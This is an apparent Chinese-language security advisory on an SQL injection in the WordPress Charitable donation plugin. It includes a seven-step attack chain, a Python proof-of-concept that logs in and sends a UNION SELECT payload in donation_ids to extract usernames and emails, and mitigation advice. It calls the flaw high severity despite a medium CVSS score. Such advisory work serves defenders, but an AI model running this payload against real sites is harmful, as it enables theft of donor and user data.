CVE-2025-11893 WordPress Charitable插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11893

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Charitable - Donation Plugin for WordPress

漏洞概述

CVE-2025-11893是WordPress平台下Charitable捐款插件的一个高危安全漏洞。该插件是WordPress生态中最受欢迎的捐款筹款工具之一，支持循环捐款和多种筹款功能。漏洞源于插件在处理用户提供的donation_ids参数时未进行充分的转义处理，同时SQL查询缺乏足够的预处理机制。攻击者利用此漏洞可以在原有SQL查询后追加恶意SQL语句，从而实现对数据库中敏感信息的非法提取。漏洞影响范围覆盖该插件1.8.8.4及之前的所有版本。由于WordPress的广泛使用和Charitable插件的高装机量，此漏洞对大量非营利组织、慈善机构和筹款平台构成严重威胁。攻击者需要拥有至少订阅者级别的WordPress账户权限，并且需要完成一次付费捐款才能触发漏洞利用条件。

技术细节

该SQL注入漏洞位于Charitable插件的抽象查询类中，具体路径为includes/abstracts/abstract-class-charitable-query.php第194行附近。漏洞产生的根本原因是双重安全缺陷的叠加：首先，程序对用户可控的donation_ids参数缺乏足够的输入验证和SQL特殊字符转义处理；其次，程序在构建SQL查询时未采用参数化查询或预编译语句等安全编程实践，导致攻击者可以通过构造精心设计的恶意payload来篡改SQL语句的逻辑结构。攻击者通过在donation_ids参数中注入UNION SELECT、布尔盲注或时间盲注等SQL注入技术，可以逐步提取数据库中的敏感信息，包括用户凭证、捐款记录、支付信息等。由于漏洞存在于插件的核心查询架构中，理论上所有涉及donation_ids参数的API端点都可能受到影响。修复版本为1.8.8.5，开发者通过引入参数化查询和增强输入验证彻底堵住了这一安全漏洞。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本和Charitable插件版本，确认漏洞存在于1.8.8.4及之前版本

STEP 2

账户获取

攻击者获取WordPress订阅者级别或更高权限的账户，可以通过注册、社工或利用其他漏洞获取

STEP 3

付费捐款

根据漏洞描述，利用此漏洞需要完成一次付费捐款，攻击者进行小额捐款以满足利用前置条件

STEP 4

构造恶意请求

攻击者构造包含SQL注入payload的donation_ids参数，使用UNION SELECT、布尔盲注或时间盲注等技术

STEP 5

触发漏洞

通过WordPress AJAX API或相关端点发送恶意请求，插件未对参数进行转义和预处理，导致SQL注入成功

STEP 6

数据提取

通过逐步注入和响应分析，攻击者提取数据库中的敏感信息，如用户凭证、捐款数据、支付信息等

STEP 7

权限提升或横向移动

获取的管理员凭据可用于进一步入侵，或利用提取的支付信息进行欺诈活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-11893 SQL Injection PoC
# Target: WordPress Charitable Plugin < 1.8.8.5
# Author: Security Researcher
# Note: This PoC is for educational and authorized testing purposes only

def exploit_sql_injection(target_url, wp_username, wp_password, donation_id):
    """
    Exploit SQL injection in Charitable plugin via donation_ids parameter
    """
    # Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    
    print(f"[*] Authenticating as {wp_username}...")
    resp = session.post(login_url, data=login_data, allow_redirects=False)
    
    if resp.status_code != 302:
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # SQL Injection payload - extract user login and email
    # Using UNION-based injection technique
    sql_payload = f"{donation_id} UNION SELECT 1,2,3,4,5,6,7,8,9,10,user_login,user_email,14,15,16,17,18,19,20 FROM wp_users--"
    
    # Target endpoint (example - actual endpoint may vary)
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    exploit_data = {
        'action': 'charitable_get_donations',
        'donation_ids': sql_payload
    }
    
    print(f"[*] Sending SQL injection payload...")
    print(f"[Payload] {sql_payload}")
    
    try:
        resp = session.post(exploit_url, data=exploit_data, timeout=30)
        
        if resp.status_code == 200:
            print(f"[+] Request sent, check response for extracted data")
            print(f"[Response] {resp.text[:500]}")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <wp_user> <wp_pass> <donation_id>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    donation_id = sys.argv[4]
    
    exploit_sql_injection(target, user, password, donation_id)

影响范围

Charitable Plugin < 1.8.8.5

防御指南

临时缓解措施

在无法立即升级插件的情况下，可采取以下临时缓解措施：首先，通过Web应用防火墙规则阻止包含可疑SQL语法的donation_ids参数请求；其次，临时限制WordPress的投稿功能，只允许管理员访问捐款管理界面；第三，启用WordPress的数据库前缀功能并修改默认的wp_前缀，增加攻击者利用难度；第四，监控wp-admin目录下的异常AJAX请求，及时发现潜在的攻击行为；最后，考虑暂时禁用Charitable插件的捐款功能，待官方发布修复版本后再恢复使用。